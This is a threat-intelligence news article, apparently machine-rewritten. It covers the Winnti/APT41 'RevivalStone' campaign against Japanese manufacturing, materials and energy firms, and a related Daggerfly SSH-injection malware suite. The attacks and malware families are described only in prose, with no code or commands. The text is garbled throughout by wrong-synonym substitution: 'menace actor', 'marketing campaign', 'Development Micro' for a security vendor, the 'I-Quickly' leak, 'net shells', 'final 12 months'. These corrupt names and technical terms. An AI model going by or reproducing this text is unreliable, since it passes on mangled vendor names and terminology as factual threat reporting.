The China-linked menace actor often called Winnti has been attributed to a brand new marketing campaign dubbed RevivalStone that focused Japanese firms within the manufacturing, supplies, and power sectors in March 2024.
The exercise, detailed by Japanese cybersecurity firm LAC, overlaps with a menace cluster tracked by Development Micro as Earth Freybug, which has been assessed to be a subset inside the APT41 cyber espionage group, by Cybereason below the identify Operation CuckooBees, and by Symantec as Blackfly.
APT41 has been described as a extremely expert and methodical actor with the flexibility to mount espionage assaults in addition to poison the provision chain. Its campaigns are sometimes designed with stealth in thoughts, leveraging a bevy of ways to realize its objectives through the use of a customized toolset that not solely bypasses security software program put in within the atmosphere, but in addition harvests essential data and establishes covert channels for persistent distant entry.
“The group’s espionage actions, a lot of that are aligned with the nation’s strategic targets, have focused a variety of private and non-private trade sectors world wide,” LAC mentioned.
“The assaults of this menace group are characterised by way of Winnti malware, which has a singular rootkit that enables for the hiding and manipulation of communications, in addition to the usage of stolen, legit digital certificates within the malware.”
Winnti, lively since at the least 2012, has primarily singled out manufacturing and materials-related organizations in Asia as of 2022, with latest campaigns between November 2023 and October 2024 concentrating on the Asia-Pacific (APAC) area exploiting weaknesses in public-facing purposes like IBM Lotus Domino to deploy malware as follows –
- DEATHLOTUS – A passive CGI backdoor that helps file creation and command execution
- UNAPIMON – A protection evasion utility written in C++
- PRIVATELOG – A loader that is used to drop Winnti RAT (aka DEPLOYLOG) which, in flip, delivers a kernel-level rootkit named WINNKIT by way of a rootkit installer
- CUNNINGPIGEON – A backdoor that makes use of Microsoft Graph API to fetch instructions – file and course of administration, and customized proxy – from mail messages
- WINDJAMMER – A rootkit with capabilities to intercept TCPIP Community Interface, in addition to create covert channels with contaminated endpoints inside intranet
- SHADOWGAZE – A passive backdoor reusing listening port from IIS net server
The most recent assault chain documented by LAC has been discovered to take advantage of an SQL injection vulnerability in an unspecified enterprise useful resource planning (ERP) system to drop net shells akin to China Chopper and Behinder (aka Bingxia and IceScorpion) on the compromised server, utilizing the entry to carry out reconnaissance, gather credentials for lateral motion, and ship an improved model of the Winnti malware.
The intrusion’s attain is claimed to have been expanded additional to breach a managed service supplier (MSP) by leveraging a shared account, adopted by weaponizing the corporate’s infrastructure to propagate the malware additional to a few different organizations.
LAC mentioned it additionally discovered references to TreadStone and StoneV5 within the RevivalStone marketing campaign, with the previous being a controller that is designed to work with the Winnti malware and which was additionally included within the I-Quickly (aka Anxun) leak of final 12 months in reference to a Linux malware management panel.
“If TreadStone has the identical which means because the Winnti malware, it is just hypothesis, however StoneV5 might additionally imply Model 5, and it’s attainable that the malware used on this assault is Winnti v5.0,” researchers Takuma Matsumoto and Yoshihiro Ishikawa mentioned.
“The brand new Winnti malware has been applied with options akin to obfuscation, up to date encryption algorithms, and evasion by security merchandise, and it’s possible that this attacker group will proceed to replace the capabilities of the Winnti malware and use it in assaults.”
The disclosure comes as Fortinet FortiGuard Labs detailed a Linux-based assault suite dubbed SSHDInjector that is geared up to hijack the SSH daemon on community home equipment by injecting malware into the method for persistent entry and covert actions since November 2024.
The malware suite, related to one other Chinese language nation-state hacking group often called Daggerfly (aka Bronze Highland and Evasive Panda), is engineered for information exfiltration, listening for incoming directions from a distant server to enumerate operating processes and providers, carry out file operations, launch terminal, and execute terminal instructions.
